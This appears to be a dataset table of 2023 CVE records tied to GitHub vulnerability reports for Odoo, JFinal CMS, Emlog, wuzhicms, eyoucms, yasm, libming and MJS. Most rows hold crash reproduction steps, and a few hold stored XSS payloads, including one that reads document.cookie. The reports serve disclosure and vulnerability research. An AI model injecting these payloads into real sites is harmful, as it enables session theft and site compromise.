cve_id stringlengths 13 16 | cve_published stringlengths 23 23 | cve_descriptions stringlengths 48 2.08k | cve_metrics dict | cve_references listlengths 1 138 | cve_configurations listlengths 1 39 | url stringlengths 37 77 | cve_tags listlengths 1 4 ⌀ | domain stringclasses 1
value | issue_owner_repo listlengths 2 2 | issue_body stringlengths 0 88.6k ⌀ | issue_title stringlengths 3 335 | issue_comments_url stringlengths 56 81 | issue_comments_count int64 0 146 | issue_created_at stringlengths 20 20 | issue_updated_at stringlengths 20 20 | issue_html_url stringlengths 37 62 | issue_github_id int64 104M 2.09B | issue_number int64 1 122k |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
CVE-2021-44547 | 2023-04-25T19:15:09.843 | A sandboxing issue in Odoo Community 15.0 and Odoo Enterprise 15.0 allows authenticated administrators to executed arbitrary code, leading to privilege escalation. | {
"cvssMetricV2": null,
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 8.7,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
... | [
{
"source": "security@odoo.com",
"tags": [
"Issue Tracking",
"Patch",
"Vendor Advisory"
],
"url": "https://github.com/odoo/odoo/issues/107696"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:odoo:odoo:*:*:*:*:community:*:*:*",
"matchCriteriaId": "C5B912BD-1FB4-418A-9CE3-FBE0903D70BA",
"versionEndExcluding": null,
"versionEndIncluding": "15.0",
"versionStartExclud... | https://github.com/odoo/odoo/issues/107696 | [
"Issue Tracking",
"Patch",
"Vendor Advisory"
] | github.com | [
"odoo",
"odoo"
] | # Security Advisory - [CVE-2021-44547](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44547)
**Affects**: Odoo 15.0 (Community and Enterprise Editions)
**CVE ID**: [CVE-2021-44547](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44547)
**Component**: Core
**Credits**: Stephane Debauche
A sandboxing i... | [SEC] CVE-2021-44547 - A sandboxing issue in Odoo Community 15.0 and... | https://api.github.com/repos/odoo/odoo/issues/107696/comments | 0 | 2022-12-10T23:00:48Z | 2022-12-10T23:00:49Z | https://github.com/odoo/odoo/issues/107696 | 1,489,087,347 | 107,696 |
CVE-2021-44775 | 2023-04-25T19:15:09.903 | Cross-site scripting (XSS) issue in Website app of Odoo Community 15.0 and earlier and Odoo Enterprise 15.0 and earlier, allows remote attackers to inject arbitrary web script in the browser of a victim, by posting crafted contents. | {
"cvssMetricV2": null,
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "HIGH",
... | [
{
"source": "security@odoo.com",
"tags": [
"Issue Tracking",
"Patch",
"Vendor Advisory"
],
"url": "https://github.com/odoo/odoo/issues/107691"
},
{
"source": "security@odoo.com",
"tags": null,
"url": "https://www.debian.org/security/2023/dsa-5399"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:odoo:odoo:*:*:*:*:community:*:*:*",
"matchCriteriaId": "C5B912BD-1FB4-418A-9CE3-FBE0903D70BA",
"versionEndExcluding": null,
"versionEndIncluding": "15.0",
"versionStartExclud... | https://github.com/odoo/odoo/issues/107691 | [
"Issue Tracking",
"Patch",
"Vendor Advisory"
] | github.com | [
"odoo",
"odoo"
] | # Security Advisory - [CVE-2021-44775](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44775)
**Affects**: Odoo 15.0 and earlier (Community and Enterprise Editions)
**CVE ID**: [CVE-2021-44775](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44775)
**Component**: Website
**Credits**: Holger Brunn (Ther... | [SEC] CVE-2021-44775 - Cross-site scripting (XSS) issue in Website a... | https://api.github.com/repos/odoo/odoo/issues/107691/comments | 0 | 2022-12-10T23:00:39Z | 2022-12-10T23:00:40Z | https://github.com/odoo/odoo/issues/107691 | 1,489,087,157 | 107,691 |
CVE-2021-45071 | 2023-04-25T19:15:09.963 | Cross-site scripting (XSS) issue Odoo Community 15.0 and earlier and Odoo Enterprise 15.0 and earlier, allows remote attackers to inject arbitrary web script in the browser of a victim, via crafted uploaded file names. | {
"cvssMetricV2": null,
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "HIGH",
... | [
{
"source": "security@odoo.com",
"tags": [
"Issue Tracking",
"Patch",
"Vendor Advisory"
],
"url": "https://github.com/odoo/odoo/issues/107697"
},
{
"source": "security@odoo.com",
"tags": null,
"url": "https://www.debian.org/security/2023/dsa-5399"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:odoo:odoo:*:*:*:*:community:*:*:*",
"matchCriteriaId": "C5B912BD-1FB4-418A-9CE3-FBE0903D70BA",
"versionEndExcluding": null,
"versionEndIncluding": "15.0",
"versionStartExclud... | https://github.com/odoo/odoo/issues/107697 | [
"Issue Tracking",
"Patch",
"Vendor Advisory"
] | github.com | [
"odoo",
"odoo"
] | # Security Advisory - [CVE-2021-45071](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45071)
**Affects**: Odoo 15.0 and earlier (Community and Enterprise Editions)
**CVE ID**: [CVE-2021-45071](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45071)
**Component**: Core
**Credits**: Lauri Vakkala, Anıl Y... | [SEC] CVE-2021-45071 - Cross-site scripting (XSS) issue Odoo Communi... | https://api.github.com/repos/odoo/odoo/issues/107697/comments | 0 | 2022-12-10T23:00:50Z | 2022-12-10T23:00:51Z | https://github.com/odoo/odoo/issues/107697 | 1,489,087,376 | 107,697 |
CVE-2021-45111 | 2023-04-25T19:15:10.020 | Improper access control in Odoo Community 15.0 and earlier and Odoo Enterprise 15.0 and earlier allows remote authenticated users to trigger the creation of demonstration data, including user accounts with known credentials. | {
"cvssMetricV2": null,
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "LOW",
... | [
{
"source": "security@odoo.com",
"tags": [
"Issue Tracking",
"Patch",
"Vendor Advisory"
],
"url": "https://github.com/odoo/odoo/issues/107683"
},
{
"source": "security@odoo.com",
"tags": null,
"url": "https://www.debian.org/security/2023/dsa-5399"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:odoo:odoo:*:*:*:*:community:*:*:*",
"matchCriteriaId": "C5B912BD-1FB4-418A-9CE3-FBE0903D70BA",
"versionEndExcluding": null,
"versionEndIncluding": "15.0",
"versionStartExclud... | https://github.com/odoo/odoo/issues/107683 | [
"Issue Tracking",
"Patch",
"Vendor Advisory"
] | github.com | [
"odoo",
"odoo"
] | # Security Advisory - [CVE-2021-45111](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45111)
**Affects**: Odoo 15.0 and earlier (Community and Enterprise Editions)
**CVE ID**: [CVE-2021-45111](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45111)
**Component**: Core
**Credits**: Nils Hamerlinck (Trob... | [SEC] CVE-2021-45111 - Improper access control in Odoo Community 15.... | https://api.github.com/repos/odoo/odoo/issues/107683/comments | 0 | 2022-12-10T23:00:25Z | 2022-12-10T23:00:26Z | https://github.com/odoo/odoo/issues/107683 | 1,489,086,907 | 107,683 |
CVE-2023-30349 | 2023-04-27T14:15:09.320 | JFinal CMS v5.1.0 was discovered to contain a remote code execution (RCE) vulnerability via the ActionEnter function. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"in... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
],
"url": "https://github.com/jflyfox/jfinal_cms/issues/54"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:jflyfox:jfinal_cms:5.1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "9B33E946-BD15-449C-B736-013773A64DF6",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExc... | https://github.com/jflyfox/jfinal_cms/issues/54 | [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
] | github.com | [
"jflyfox",
"jfinal_cms"
] | jfinal_cms version:5.1.0
JDK version : jdk-8u351
The ActionEnter class is instantiated in the index method of the /ueditor route

The ConfigManager class is instantiated in the constructor of the Act... | jfinal CMS v5.1.0 has a command execution vulnerability exists | https://api.github.com/repos/jflyfox/jfinal_cms/issues/54/comments | 5 | 2023-02-10T07:03:59Z | 2024-01-07T08:18:27Z | https://github.com/jflyfox/jfinal_cms/issues/54 | 1,579,105,443 | 54 |
CVE-2023-30338 | 2023-04-27T15:15:13.787 | Multiple stored cross-site scripting (XSS) vulnerabilities in Emlog Pro v2.0.3 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Article Title or Article Summary parameters. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integ... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Vendor Advisory"
],
"url": "https://github.com/emlog/emlog/issues/229"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:emlog:emlog:2.0.3:*:*:*:pro:*:*:*",
"matchCriteriaId": "5B872763-766F-478B-BA9C-97A85DC372F5",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcludin... | https://github.com/emlog/emlog/issues/229 | [
"Exploit",
"Issue Tracking",
"Patch",
"Vendor Advisory"
] | github.com | [
"emlog",
"emlog"
] | **Version(latest version)**
emlog_pro_2.0.3
**Actual behavior**
XSS vulnerabilities
**Steps to reproduce the behavior**
1.There is a stored xss in the article writing. The article body(文章正文) and article summary(文章摘要) has the vulnerability.
在写文章功能点,文章正文以及文章摘要处存在存储型xss

swfrender - part of swftools 0.9.2
## sample
[id7_heap-buffer-overflow.zip](https://github.com/keepinggg/poc/blob/main/poc_of_swfrender/id7_heap-buffer-overflow.zip)
## crash
```
./swfrender id7_heap-buffer-o... | bug report -- swfrender | https://api.github.com/repos/swftools/swftools/issues/198/comments | 0 | 2023-03-23T06:44:18Z | 2023-03-23T06:44:18Z | https://github.com/swftools/swftools/issues/198 | 1,636,946,205 | 198 |
CVE-2023-30123 | 2023-04-28T14:15:11.047 | wuzhicms v4.1.0 is vulnerable to Cross Site Scripting (XSS) in the Member Center, Account Settings. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integ... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/wuzhicms/wuzhicms/issues/205#issue-1635153937"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:wuzhicms:wuzhicms:4.1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "2B76E69A-B2F3-4359-A7C0-046CEE2FAEEB",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcl... | https://github.com/wuzhicms/wuzhicms/issues/205#issue-1635153937 | [
"Exploit",
"Issue Tracking"
] | github.com | [
"wuzhicms",
"wuzhicms"
] | There is a Stored-XSS vulnerability in WUZHI CMS 4.1.0
Member Center - Account Settings
POC
The payload is `"><details/open/ontoggle=alert('/xss/')>`

. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integ... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/weng-xianhu/eyoucms/issues/40"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:eyoucms:eyoucms:1.6.1-utf8-sp1:*:*:*:*:*:*:*",
"matchCriteriaId": "91E07F04-0ABB-44F1-AAA5-E4E8E7B3DE92",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionSt... | https://github.com/weng-xianhu/eyoucms/issues/40 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"weng-xianhu",
"eyoucms"
] | Version: V1.6.1-UTF8-sp1

1. Go to the background --> Advertising management -->Add new ads
2. Then fill in the payload " <style onload=alert(document.cookie) />"in the ad content.

How to trigger
Compile the program with AddressSanitizer
Run command $ ./yasm -w -W -M $PoC
Details
ASAN report
$./yasm -w -W -M $PoC
```
yasm: warning: unrecogni... | yasm heap use-after-free bug | https://api.github.com/repos/yasm/yasm/issues/209/comments | 1 | 2023-03-01T02:17:35Z | 2023-05-10T05:20:07Z | https://github.com/yasm/yasm/issues/209 | 1,604,108,494 | 209 |
CVE-2023-31974 | 2023-05-09T13:15:18.550 | yasm v1.3.0 was discovered to contain a use after free via the function error at /nasm/nasm-pp.c. Note: Multiple third parties dispute this as a bug and not a vulnerability according to the YASM security policy. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/yasm/yasm/issues/208"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:tortall:yasm:1.3.0:*:*:*:*:*:*:*",
"matchCriteriaId": "1453CF78-5025-49BF-A1A6-C62F948B5735",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding... | https://github.com/yasm/yasm/issues/208 | [
"Exploit",
"Issue Tracking"
] | github.com | [
"yasm",
"yasm"
] |
I found a heap-use-after-free in yasm.
Please confirm.
Thanks!
Test Environment
Ubuntu 20.04, 64 bit yasm (version: v1.3.0 ;master)
How to trigger
Compile the program with AddressSanitizer
Run command $ ./yasm -w -W -M $PoC
Details
ASAN report
$./yasm -w -W -M $PoC
```
yasm: warning: unrecogni... | yasm heap use-after-free bug | https://api.github.com/repos/yasm/yasm/issues/208/comments | 1 | 2023-03-01T02:08:44Z | 2023-05-10T05:20:11Z | https://github.com/yasm/yasm/issues/208 | 1,604,101,306 | 208 |
CVE-2023-31975 | 2023-05-09T13:15:18.590 | yasm v1.3.0 was discovered to contain a memory leak via the function yasm_intnum_copy at /libyasm/intnum.c. Note: Multiple third parties dispute this as a bug and not a vulnerability according to the YASM security policy. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "LOW",
"baseScore": 3.3,
"baseSeverity": "LOW",
"confidentialityImpact": "NONE",
"integrityI... | [
{
"source": "cve@mitre.org",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "http://www.openwall.com/lists/oss-security/2023/06/20/6"
},
{
"source": "cve@mitre.org",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "http://www.openwal... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:yasm_project:yasm:1.3.0:*:*:*:*:*:*:*",
"matchCriteriaId": "AD6556F7-3880-452A-ABA9-1A8A14BA41F3",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcl... | https://github.com/yasm/yasm/issues/210 | [
"Exploit",
"Issue Tracking"
] | github.com | [
"yasm",
"yasm"
] |
I found a memory leak bug in yasm.
Please confirm.
Thanks!
### Test Environment
Ubuntu 20.04, 64 bit yasm (version: v1.3.0 ;master)
### How to trigger
Compile the program with AddressSanitizer
Run command
$ touch u
$ ./yasm -ium u
### Details
ASAN report
$./yasm -ium u
```
yasm: file name ... | yasm memory leak | https://api.github.com/repos/yasm/yasm/issues/210/comments | 5 | 2023-03-01T02:27:11Z | 2024-03-22T11:43:38Z | https://github.com/yasm/yasm/issues/210 | 1,604,119,944 | 210 |
CVE-2023-31973 | 2023-05-09T14:15:13.737 | yasm v1.3.0 was discovered to contain a use after free via the function expand_mmac_params at /nasm/nasm-pp.c. Note: Multiple third parties dispute this as a bug and not a vulnerability according to the YASM security policy. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/yasm/yasm/issues/207"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:tortall:yasm:1.3.0:*:*:*:*:*:*:*",
"matchCriteriaId": "1453CF78-5025-49BF-A1A6-C62F948B5735",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding... | https://github.com/yasm/yasm/issues/207 | [
"Exploit",
"Issue Tracking"
] | github.com | [
"yasm",
"yasm"
] | I found a heap-use-after-free in yasm.
Please confirm.
Thanks!
Test Environment
Ubuntu 20.04, 64 bit yasm (version: v1.3.0 ;master)
How to trigger
Compile the program with AddressSanitizer
Run command $ ./yasm -w -W -M $PoC
Details
ASAN report
$./yasm -w -W -M $PoC
```
yasm: warning: unrecognized ... | yasm heap use-after-free bug | https://api.github.com/repos/yasm/yasm/issues/207/comments | 1 | 2023-03-01T02:03:35Z | 2023-05-10T05:20:08Z | https://github.com/yasm/yasm/issues/207 | 1,604,096,378 | 207 |
CVE-2023-31976 | 2023-05-09T14:15:13.780 | libming v0.4.8 was discovered to contain a stack buffer overflow via the function makeswf_preprocess at /util/makeswf_utils.c. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/libming/libming/issues/265"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:libming:libming:0.4.8:*:*:*:*:*:*:*",
"matchCriteriaId": "DD92BC79-2548-4C6F-9BDD-26C12BDF68AC",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExclud... | https://github.com/libming/libming/issues/265 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"libming",
"libming"
] |
When the program input contains the option of "-D" or "-o" , the program will cause stack buffer overflow error.
Test Environment
Ubuntu 20.04, 64 bit libming (master ; commit [04aee52](https://github.com/libming/libming/commit/04aee52363688426eab74f5d6180c149654a6473))
How to trigger
Compile the progra... | makeswf stack buffer overflow | https://api.github.com/repos/libming/libming/issues/265/comments | 0 | 2023-02-28T06:17:08Z | 2023-02-28T06:17:08Z | https://github.com/libming/libming/issues/265 | 1,602,439,311 | 265 |
CVE-2021-31240 | 2023-05-09T16:15:14.147 | An issue found in libming v.0.4.8 allows a local attacker to execute arbitrary code via the parseSWF_IMPORTASSETS function in the parser.c file. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrit... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/libming/libming/issues/218"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:libming:libming:0.4.8:*:*:*:*:*:*:*",
"matchCriteriaId": "DD92BC79-2548-4C6F-9BDD-26C12BDF68AC",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExclud... | https://github.com/libming/libming/issues/218 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"libming",
"libming"
] | Hi, I found a memory leak problem.
version: 0.4.8
command: swftophp poc
poc:
[parser.c_2556.zip](https://github.com/libming/libming/files/6276040/parser.c_2556.zip)
Here is the report from ASAN:
```
`header indicates a filesize of 761 but filesize is 550
<?php
$m = new SWFMovie(8);
ming_setscale(1.0);
$m... | Memory leaks in parseSWF_IMPORTASSETS | https://api.github.com/repos/libming/libming/issues/218/comments | 0 | 2021-04-08T04:46:50Z | 2021-04-08T04:46:50Z | https://github.com/libming/libming/issues/218 | 853,054,686 | 218 |
CVE-2023-30083 | 2023-05-09T16:15:14.373 | Buffer Overflow vulnerability found in Libming swftophp v.0.4.8 allows a local attacker to cause a denial of service via the newVar_N in util/decompile.c. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/libming/libming/issues/266"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:libming:libming:0.4.8:*:*:*:*:*:*:*",
"matchCriteriaId": "DD92BC79-2548-4C6F-9BDD-26C12BDF68AC",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExclud... | https://github.com/libming/libming/issues/266 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"libming",
"libming"
] | Heap buffer overflow in the latest version of libming at function newVar_N in util/decompile.c:654.
## Environment
Ubuntu 18.04, 64 bit
libming 0.4.8
## Steps to reproduce
1. download file
```
wget https://github.com/libming/libming/archive/refs/tags/ming-0_4_8.tar.gz
tar -zxvf ming-0_4_8.tar.gz
```
2. co... | Heap buffer overflow in newVar_N() at decompile.c:654 | https://api.github.com/repos/libming/libming/issues/266/comments | 0 | 2023-03-21T06:45:54Z | 2023-03-21T06:45:54Z | https://github.com/libming/libming/issues/266 | 1,633,318,454 | 266 |
CVE-2023-30084 | 2023-05-09T16:15:14.423 | An issue found in libming swftophp v.0.4.8 allows a local attacker to cause a denial of service via the stackVal function in util/decompile.c. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/libming/libming/issues/268"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:libming:libming:0.4.8:*:*:*:*:*:*:*",
"matchCriteriaId": "DD92BC79-2548-4C6F-9BDD-26C12BDF68AC",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExclud... | https://github.com/libming/libming/issues/268 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"libming",
"libming"
] | Invalid memory read in the latest version of libming at function stackVal in util/decompile.c:1238.
## Environment
Ubuntu 18.04, 64 bit
libming 0.4.8
## Steps to reproduce
1. download file
```
wget https://github.com/libming/libming/archive/refs/tags/ming-0_4_8.tar.gz
tar -zxvf ming-0_4_8.tar.gz
```
2. co... | Invalid memory read in stackVal() at decompile.c:1238 | https://api.github.com/repos/libming/libming/issues/268/comments | 0 | 2023-03-21T06:53:51Z | 2023-03-21T06:53:51Z | https://github.com/libming/libming/issues/268 | 1,633,325,057 | 268 |
CVE-2023-30085 | 2023-05-09T16:15:14.470 | Buffer Overflow vulnerability found in Libming swftophp v.0.4.8 allows a local attacker to cause a denial of service via the cws2fws function in util/decompile.c. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/libming/libming/issues/267"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:libming:libming:0.4.8:*:*:*:*:*:*:*",
"matchCriteriaId": "DD92BC79-2548-4C6F-9BDD-26C12BDF68AC",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExclud... | https://github.com/libming/libming/issues/267 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"libming",
"libming"
] | Allocation size overflow in the latest version of libming at function cws2fws in util/main.c:111.
## Environment
Ubuntu 18.04, 64 bit
libming 0.4.8
## Steps to reproduce
1. download file
```
wget https://github.com/libming/libming/archive/refs/tags/ming-0_4_8.tar.gz
tar -zxvf ming-0_4_8.tar.gz
```
2. comp... | Allocation size overflow in cws2fws() at main.c:111 | https://api.github.com/repos/libming/libming/issues/267/comments | 0 | 2023-03-21T06:50:17Z | 2023-03-21T06:50:17Z | https://github.com/libming/libming/issues/267 | 1,633,322,109 | 267 |
CVE-2023-30087 | 2023-05-09T16:15:14.547 | Buffer Overflow vulnerability found in Cesanta MJS v.1.26 allows a local attacker to cause a denial of service via the mjs_mk_string function in mjs.c. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
],
"url": "https://github.com/cesanta/mjs/issues/244"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:cesanta:mjs:1.26:*:*:*:*:*:*:*",
"matchCriteriaId": "25C97820-C80A-41CE-B510-F292D2AF665E",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding":... | https://github.com/cesanta/mjs/issues/244 | [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
] | github.com | [
"cesanta",
"mjs"
] | Heap buffer overflow in mjs at function mjs_mk_string in mjs.c:13671.
## Environment
Ubuntu 18.04, 64 bit
## Steps to reproduce
1. download file
```
git clone https://github.com/cesanta/mjs.git mjs
cd mjs
git checkout 9eae0e6
```
2. compile libming with ASAN
```
clang -fsanitize=address mjs.c -o mjs_asa... | Heap buffer overflow in mjs_mk_string() at mjs.c:13671 | https://api.github.com/repos/cesanta/mjs/issues/244/comments | 0 | 2023-03-22T09:15:39Z | 2023-03-22T09:15:39Z | https://github.com/cesanta/mjs/issues/244 | 1,635,358,781 | 244 |
CVE-2023-30088 | 2023-05-09T16:15:14.583 | An issue found in Cesanta MJS v.1.26 allows a local attacker to cause a denial of service via the mjs_execute function in mjs.c. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
],
"url": "https://github.com/cesanta/mjs/issues/243"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:cesanta:mjs:1.26:*:*:*:*:*:*:*",
"matchCriteriaId": "25C97820-C80A-41CE-B510-F292D2AF665E",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding":... | https://github.com/cesanta/mjs/issues/243 | [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
] | github.com | [
"cesanta",
"mjs"
] | Invalid memory read in mjs at function mjs_execute in mjs.c:9320.
## Environment
Ubuntu 18.04, 64 bit
## Steps to reproduce
1. download file
```
git clone https://github.com/cesanta/mjs.git mjs
cd mjs
git checkout d6c06a6
```
2. compile libming with ASAN
```
clang -fsanitize=address mjs.c -o mjs_asan
`... | Invalid memory read in mjs_execute() at mjs.c:9320 | https://api.github.com/repos/cesanta/mjs/issues/243/comments | 1 | 2023-03-22T09:15:01Z | 2023-05-15T14:19:13Z | https://github.com/cesanta/mjs/issues/243 | 1,635,357,898 | 243 |
